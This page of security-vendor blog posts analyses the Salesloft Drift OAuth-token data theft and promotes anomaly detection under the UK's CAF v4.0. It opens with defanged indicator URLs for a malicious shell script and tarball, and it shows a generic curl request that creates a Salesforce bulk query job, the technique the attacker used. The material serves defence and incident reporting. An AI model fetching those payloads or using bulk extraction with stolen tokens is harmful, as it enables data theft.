  • http[:]//b[.]9-9-8[.]com/brysj/d/d.sh
  • http[:]//b[.]9-9-8[.]com/brysj/d/enbio.tar

References:

  1. https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/YARN.html
  2. https://www.atlassian.com/software/confluence
  3. https://www.crowdstrike.com/en-us/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/
  4. https://nvd.nist.gov/vuln/detail/cve-2022-26134
  5. https://github.com/WangYihang/Platypus
  6. https://www.gnu.org/software/bash/manual/html_node/The-Shopt-Builtin.html
  7. https://github.com/gianlucaborello/libprocesshider
  8. https://github.com/m0nad/Diamorphine
  9. https://www.darktrace.com/blog/migo-a-redis-miner-with-novel-system-weakening-techniques
  10. https://www.cadosecurity.com/blog/watchdog-continues-to-target-east-asian-csps
  11. https://www.darktrace.com/blog/the-nine-lives-of-commando-cat-analyzing-a-novel-malware-campaign-targeting-docker
  12. https://github.com/zmap/zgrab2
  13. https://www.trendmicro.com/en_us/research/21/g/threat-actors-exploit-misconfigured-apache-hadoop-yarn.html
  14. https://www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts


September 8, 2025

Unpacking the Salesloft Incident: Insights from Darktrace Observations


Introduction

On August 26, 2025, Google Threat Intelligence Group released a report detailing a widespread data theft campaign targeting the sales automation platform Salesloft, via compromised OAuth tokens used by the third-party Drift AI chat agent [1][2]. The attack has been attributed to the threat actor UNC6395 by Google Threat Intelligence and Mandiant [1].

The attack is believed to have begun in early August 2025 and continued through mid-August 2025, with the threat actor exporting significant volumes of data from multiple Salesforce instances [1]. The actor then sifted through this data for anything that could be used to compromise victims’ environments, such as access keys, tokens or passwords. This led Google Threat Intelligence Group to assess that the threat actor’s primary intent is credential harvesting; it later reported that it was aware of more than 700 potentially impacted organizations [3].

Salesloft previously stated that, based on currently available data, customers that do not integrate with Salesforce are unaffected by this campaign [2]. However, on August 28, Google Threat Intelligence Group announced that “Based on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations” [2]. Google Threat Intelligence has since advised that any and all authentication tokens stored in or connected to the Drift platform be treated as potentially compromised [1].

This campaign demonstrates how attackers are increasingly exploiting trusted Software-as-a-Service (SaaS) integrations as a pathway into enterprise environments.

By abusing these integrations, threat actors were able to exfiltrate sensitive business data at scale, bypassing traditional security controls. Rather than relying on malware or obvious intrusion techniques, the adversaries leveraged legitimate credentials and API traffic that resembled legitimate Salesforce activity to achieve their goals. This type of activity is far harder to detect with conventional security tools, since it blends in with the daily noise of business operations.

The incident underscores the escalating significance of autonomous coverage within SaaS and third-party ecosystems. As businesses increasingly depend on interconnected platforms, visibility gaps become evident that cannot be managed by conventional perimeter and endpoint defenses.

By developing a behavioral understanding of each organization's distinct use of cloud services, defenders can detect anomalies such as logins from unexpected locations, unusually high volumes of API requests, or unusual document activity. These indicators serve as an early warning system, even when intruders use legitimate tokens or accounts, enabling security teams to step in before extensive data exfiltration takes place.

What happened?

The campaign is believed to have started on August 8, 2025, with malicious activity continuing until at least August 18. The threat actor, tracked as UNC6395, gained access via compromised OAuth tokens associated with Salesloft Drift integrations into Salesforce [1]. Once tokens were obtained, the attackers were able to issue large volumes of Salesforce API requests, exfiltrating sensitive customer and business data.

Initial Intrusion

The attackers first established access by abusing OAuth and refresh tokens from the Drift integration. These tokens gave them persistent access into Salesforce environments without requiring further authentication [1]. To expand their foothold, the threat actor also made use of TruffleHog [4], an open-source secrets scanner, to hunt for additional exposed credentials. Logs later revealed anomalous IAM updates, including unusual UpdateAccessKey activity, which suggested attempts to ensure long-term persistence and control within compromised accounts.

Internal Reconnaissance & Data Exfiltration

Once inside, the adversaries began exploring the Salesforce environments. They ran queries designed to pull sensitive data fields, focusing on objects such as Cases, Accounts, Users, and Opportunities [1]. At the same time, the attackers sifted through this information to identify secrets that could enable access to other systems, including AWS keys and Snowflake credentials [4]. This phase demonstrated the opportunistic nature of the campaign, with the actors looking for any data that could be repurposed for further compromise.

Lateral Movement

Salesloft and Mandiant investigations revealed that the threat actor also created at least one new user account in early September. Although follow-up activity linked to this account was limited, the creation itself suggested a persistence mechanism designed to survive remediation efforts. By maintaining a separate identity, the attackers ensured they could regain access even if their stolen OAuth tokens were revoked.

Accomplishing the mission

The data taken from Salesforce environments included valuable business records, which attackers used to harvest credentials and identify high-value targets. According to Mandiant, once the data was exfiltrated, the actors actively sifted through it to locate sensitive information that could be leveraged in future intrusions [1]. In response, Salesforce and Salesloft revoked OAuth tokens associated with Drift integrations on August 20 [1], a containment measure aimed at cutting off the attackers’ primary access channel and preventing further abuse.

How did the attack bypass the rest of the security stack?

The campaign effectively bypassed security measures by using legitimate credentials and OAuth tokens through the Salesloft Drift integration. This rendered traditional security defenses like endpoint protection and firewalls ineffective, as the activity appeared non-malicious [1]. The attackers blended into normal operations by using common user agents and making queries through the Salesforce API, which made their activity resemble legitimate integrations and scripts. This allowed them to operate undetected in the SaaS environment, exploiting the trust in third-party connections and highlighting the limitations of traditional detection controls.

Darktrace Coverage

Darktrace identified anomalous activity across multiple deployments that appears to be associated with this campaign. This included two cases involving US-based customers with a Salesforce integration, where the pattern of activity was notably similar.

On August 17, Darktrace observed an account belonging to one of these customers logging in from the rare endpoint 208.68.36[.]90, while the user was seen active from another location. This IP is a known indicator of compromise (IoC) reported by open-source intelligence (OSINT) for the campaign [2].

Figure 1: Cyber AI Analyst Incident summarizing the suspicious login seen for the account.

The login event was associated with the application Drift, further connecting the events to this campaign.

Figure 2: Advanced Search logs showing the Application used to login.

Following the login, the actor initiated a high volume of Salesforce API requests using methods such as GET, POST, and DELETE. The GET requests targeted endpoints like /services/data/v57.0/query and /services/data/v57.0/sobjects/Case/describe, where the former is used to retrieve records based on a specific criterion, while the latter provides metadata for the Case object, including field names and data types [5,6].

Subsequently, a POST request to /services/data/v57.0/jobs/query was observed, likely to initiate a Bulk API query job for extracting large volumes of data from the Ingest Job endpoint [7,8].
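
For context, creating a Bulk API 2.0 query job is a documented Salesforce operation; a generic request of this shape (illustrative values only, not the attacker's actual query) looks like the following:

    # Illustrative Salesforce Bulk API 2.0 query job creation (generic example)
    curl -s -X POST "https://<instance>.my.salesforce.com/services/data/v57.0/jobs/query" \
        -H "Authorization: Bearer <OAuth access token>" \
        -H "Content-Type: application/json" \
        -d '{ "operation": "query", "query": "SELECT Id, Subject, Description FROM Case" }'
    # The response includes a job id; results are later fetched from /services/data/v57.0/jobs/query/<job id>/results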

Finally, a DELETE request was made to remove an ingestion job batch, possibly in an attempt to obscure traces of prior data access or manipulation.

A case on another US-based customer took place a day later, on August 18. This again began with an account logging in from the rare IP 208.68.36[.]90 involving the application Drift. This was followed by Salesforce GET requests targeting the same endpoints as seen in the previous case, and then a POST to the Ingest Job endpoint and finally a DELETE request, all occurring within one minute of the initial suspicious login.

The chain of anomalous behaviors, including a suspicious login and delete request, resulted in Darktrace’s Autonomous Response capability suggesting a ‘Disable user’ action. However, the customer’s deployment configuration required manual confirmation for the action to take effect.

Figure 3: An example model alert for the user, triggered due to an anomalous API DELETE request.
Figure 4: Model Alert Event Log showing various model alerts for the account that ultimately led to an Autonomous Response model being triggered.

Conclusion

In conclusion, this incident underscores the escalating risks of SaaS supply chain attacks, where third-party integrations can become avenues for attacks. It demonstrates how adversaries can exploit legitimate OAuth tokens and API traffic to circumvent traditional defenses. This emphasizes the necessity for constant monitoring of SaaS and cloud activity, beyond just endpoints and networks, while also reinforcing the significance of applying least privilege access and routinely reviewing OAuth permissions in cloud environments. Furthermore, it provides a wider perspective into the evolution of the threat landscape, shifting towards credential and token abuse as opposed to malware-driven compromise.

Appendices

Darktrace Model Detections

·      SaaS / Access / Unusual External Source for SaaS Credential Use

·      SaaS / Compromise / Login From Rare Endpoint While User Is Active

·      SaaS / Compliance / Anomalous Salesforce API Event

·      SaaS / Unusual Activity / Multiple Unusual SaaS Activities

·      Antigena / SaaS / Antigena Unusual Activity Block

·      Antigena / SaaS / Antigena Suspicious Source Activity Block

Customers should consider integrating Salesforce with Darktrace where possible. These integrations allow better visibility and correlation to spot unusual behavior and possible threats.

IoC List

(IoC – Type)

·      208.68.36[.]90 – IP Address

References

1.     https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift

2.     https://trust.salesloft.com/?uid=Drift+Security+Update%3ASalesforce+Integrations+%283%3A30PM+ET%29

3.     https://thehackernews.com/2025/08/salesloft-oauth-breach-via-drift-ai.html

4.     https://unit42.paloaltonetworks.com/threat-brief-compromised-salesforce-instances/

5.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_query.htm

6.     https://developer.salesforce.com/docs/atlas.en-us.api_rest.meta/api_rest/resources_sobject_describe.htm

7.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/get_job_info.htm

8.     https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/query_create_job.htm

About the author
Emma Foulger
Global Threat Research Operations Lead


September 8, 2025

Cyber Assessment Framework v4.0 Raises the Bar: 6 Questions every security team should ask about their security posture


What is the Cyber Assessment Framework?

The Cyber Assessment Framework (CAF) acts as a guide for UK organizations, particularly those operating essential services, critical national infrastructure and regulated sectors, for assessing, managing and improving their cybersecurity, cyber resilience and cyber risk profile.

The guidance in the Cyber Assessment Framework aligns with regulations such as The Network and Information Systems Regulations (NIS), The Network and Information Security Directive (NIS2) and the Cyber Security and Resilience Bill.

What’s new with the Cyber Assessment Framework 4.0?

On 6 August 2025, the UK’s National Cyber Security Centre (NCSC) released Cyber Assessment Framework 4.0 (CAF v4.0), a pivotal update that reflects the increasingly complex threat landscape and the regulatory need for organisations to respond in smarter, more adaptive ways.

The Cyber Assessment Framework v4.0 introduces significant shifts in expectations, including, but not limited to:

  • Understanding threats in terms of the capabilities, methods and techniques of threat actors and the importance of maintaining a proactive security posture (A2.b)
  • The use of secure software development principles and practices (A4.b)
  • Ensuring threat intelligence is understood and utilised - with a focus on anomaly-based detection (C1.f)
  • Performance of proactive threat hunting with automation where appropriate (C2.a)

This blog post will focus on these components of the framework. However, we encourage readers to get the full scope of the framework by visiting the NCSC website, where the complete framework is published.

In summary, the changes to the framework send a clear signal: the UK’s technical authority now expects organisations to move beyond static rule-based systems and embrace more dynamic, automated defences. For those responsible for securing critical national infrastructure and essential services, these updates are not simply technical preferences, but operational mandates.

At Darktrace, this evolution comes as no surprise. In fact, it reflects the approach we've championed since our inception.

Why Darktrace? Leading the way since 2013

Darktrace was built on the principle that detecting cyber threats in real time requires more than signatures, thresholds, or retrospective analysis. Instead, we pioneered a self-learning approach powered by artificial intelligence that understands the unique “normal” for every environment and uses this baseline to spot subtle deviations indicative of emerging threats.

From the beginning, Darktrace has understood that rules and lists will never keep pace with adversaries. That’s why we’ve spent over a decade developing AI that doesn't just alert, it learns, reasons, explains, and acts.

With Cyber Assessment Framework v4.0, the bar has been raised to meet this new reality. For technical practitioners tasked with evaluating their organisation’s readiness, there are six essential questions that should guide the selection or validation of anomaly detection capabilities.

6 Questions you should ask about your security posture to align with CAF v4

1. Can your tools detect threats by identifying anomalies?

Cyber Assessment Framework v4.0 principle C1.f has been added in this version and requires that, “Threats to the operation of network and information systems, and corresponding user and system behaviour, are sufficiently understood. These are used to detect cyber security incidents.”

This marks a significant shift away from traditional signature-based approaches, which rely on known Indicators of Compromise (IoCs) or predefined rules, towards an expectation that normal user and system behaviour is understood well enough to enable abnormality detection.

Why this shift?

An overemphasis on threat intelligence alone leaves defenders exposed to novel threats or new variations of existing threats. By including reference to “understanding user and system behaviour” the framework is broadening the methods of threat detection beyond the use of threat intelligence and historical attack data.

While CAF v4.0 places emphasis on understanding normal user and system behaviour, and on using that understanding to detect abnormalities and, as a result, adverse activity, there is a further expectation that threats are understood in terms of industry-specific issues and that monitoring is continually updated.

Darktrace uses an anomaly-based approach to threat detection which involves establishing a dynamic baseline of “normal” for your environment, then flagging deviations from that baseline — even when there are no known IoCs to match against. This allows security teams to surface previously unseen tactics, techniques, and procedures in real time, whether it’s:

  • An unexpected outbound connection pattern (e.g., DNS tunnelling);
  • A first-time API call between critical services;
  • Unusual calls between services; or  
  • Sensitive data moving outside normal channels or timeframes.

The requirement that organisations must be equipped to monitor their environment, create an understanding of normal and detect anomalous behaviour aligns closely with Darktrace’s capabilities.

2. Is threat hunting structured, repeatable, and improving over time?

CAF v4.0 introduces a new focus on structured threat hunting to detect adverse activity that may evade standard security controls or when such controls are not deployable.  

Principle C2.a outlines the need for documented, repeatable threat hunting processes and stresses the importance of recording and reviewing hunts to improve future effectiveness. This inclusion acknowledges that reactive threat hunting is not sufficient. Instead, the framework calls for:

  • Pre-determined and documented methods to ensure threat hunts can be deployed at the requisite frequency;
  • Threat hunts to be converted  into automated detection and alerting, where appropriate;  
  • Maintenance of threat hunt  records and post-hunt analysis to drive improvements in the process and overall security posture;
  • Regular review of the threat hunting process to align with updated risks;
  • Leveraging automation for improvement, where appropriate;
  • Focus on threat tactics, techniques and procedures, rather than one-off indicators of compromise.

Traditionally, playbook creation has been a manual process — static, slow to amend, and limited by human foresight. Even automated SOAR playbooks tend to be stock templates that can’t cover the full spectrum of threats or reflect the specific context of your organisation.

CAF v4.0 sets the expectation that organisations should maintain documented, structured approaches to incident response. But Darktrace / Incident Readiness & Recovery goes further. Its AI-generated playbooks are bespoke to your environment and updated dynamically in real time as incidents unfold. This continuous refresh of “New Events” means responders always have the latest view of what’s happening, along with an updated understanding of the AI's interpretation based on real-time contextual awareness, and recommended next steps tailored to the current stage of the attack.

The result is far beyond checkbox compliance: a living, adaptive response capability that reduces investigation time, speeds containment, and ensures actions are always proportionate to the evolving threat.

3. Do you have a proactive security posture?

Cyber Assessment Framework v4.0 does not just want organisations to detect threats; it expects them to anticipate and reduce cyber risk before an incident ever occurs. That is why principle A2.b calls for a security posture that moves from reactive detection to predictive, preventative action.

A proactive security posture focuses on reducing the ease of the most likely attack paths in advance and reducing the number of opportunities an adversary has to succeed in an attack.

To meet this requirement, organisations could benefit from looking for solutions that can:

  • Continuously map the assets and users most critical to operations;
  • Identify vulnerabilities and misconfigurations in real time;
  • Model likely adversary behaviours and attack paths using frameworks like MITRE ATT&CK; and  
  • Prioritise remediation actions that will have the highest impact on reducing overall risk.

When done well, this approach creates a real-time picture of your security posture, one that reflects the dynamic nature of both your internal environment and the evolving external threat landscape. This enables security teams to focus their time on other areas, such as validating resilience through exercises like red teaming or forecasting.

4. Can your team/tools customize detection rules and enable autonomous responses?

CAF v4.0 places greater emphasis on reducing false positives and acting decisively when genuine threats are detected.  

The framework highlights the need for customisable detection rules and, where appropriate, autonomous response actions that can contain threats before they escalate:

The following new requirements are included:  

  • C1.c.: Alerts and detection rules should be adjustable to reduce false positives and optimise responses. Custom tooling and rules are used in conjunction with off the shelf tooling and rules;
  • C1.d: You investigate and triage alerts from all security tools and take action – allowing for improvement and prioritization of activities;
  • C1.e: Monitoring and detection personnel have sufficient understanding of operational context and deal with workload effectively as well as identifying areas for improvement (alert or triage fatigue is not present);
  • C2.a: Threat hunts should be turned into automated detections and alerting where appropriate and automation should be leveraged to improve threat hunting.

Tailored detection rules improve accuracy, while automation accelerates response, both of which help satisfy regulatory expectations. Cyber AI Analyst allows for AI investigation of alerts and can dramatically reduce the time a security team spends on alerts, reducing alert fatigue, allowing more time for strategic initiatives and identifying improvements.

5. Is your software secure and supported?  

CAF v4.0 introduced a new principle which requires software suppliers to leverage an established secure software development framework. Software suppliers must be able to demonstrate:  

  • A thorough understanding of the composition and provenance of software provided;  
  • That the software development lifecycle is informed by a detailed and up to date understanding of threat; and  
  • They can attest to the authenticity and integrity of the software, including updates and patches.  

Darktrace is committed to secure software development and all Darktrace products and internally developed systems are developed with secure engineering principles and security by design methodologies in place. Darktrace commits to the inclusion of security requirements at all stages of the software development lifecycle. Darktrace is ISO 27001, ISO 27018 and ISO 42001 Certified – demonstrating an ongoing commitment to information security, data privacy and artificial intelligence management and compliance, throughout the organisation.  

6. Is your incident response plan built on a true understanding of your environment and does it adapt to changes over time?

CAF v4.0 raises the bar for incident response by making it clear that a plan is only as strong as the context behind it. Your response plan must be shaped by a detailed, up-to-date understanding of your organisation’s specific network, systems, and operational priorities.

The framework’s updates emphasise that:

  • Plans must explicitly cover the network and information systems that underpin your essential functions because every environment has different dependencies, choke points, and critical assets.
  • They must be readily accessible even when IT systems are disrupted, ensuring critical steps and contact paths aren’t lost during an incident.
  • They should be reviewed regularly to keep pace with evolving risks, infrastructure changes, and lessons learned from testing.

From government expectation to strategic advantage

Cyber Assessment Framework v4.0 signals a powerful shift in cybersecurity best practice. The newest version sets a higher standard for detection performance, risk management, threat hunting, software development and proactive security posture.

For Darktrace, this is validation of the approach we have taken since the beginning: to go beyond rules and signatures to deliver proactive cyber resilience in real-time.

-----

Disclaimer:

This document has been prepared on behalf of Darktrace Holdings Limited. It is provided for information purposes only to provide prospective readers with general information about the Cyber Assessment Framework (CAF) in a cyber security context. It does not constitute legal, regulatory, financial or any other kind of professional advice and it has not been prepared with the reader and/or its specific organisation’s requirements in mind. Darktrace offers no warranties, guarantees, undertakings or other assurances (whether express or implied)  that: (i) this document or its content are  accurate or complete; (ii) the steps outlined herein will guarantee compliance with CAF; (iii) any purchase of Darktrace’s products or services will guarantee compliance with CAF; (iv) the steps outlined herein are appropriate for all customers. Neither the reader nor any third party is entitled to rely on the contents of this document when making/taking any decisions or actions to achieve compliance with CAF. To the fullest extent permitted by applicable law or regulation, Darktrace has no liability for any actions or decisions taken or not taken by the reader to implement any suggestions contained herein, or for any third party products, links or materials referenced. Nothing in this document negates the responsibility of the reader to seek independent legal or other advice should it wish to rely on any of the statements, suggestions, or content set out herein.  

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.
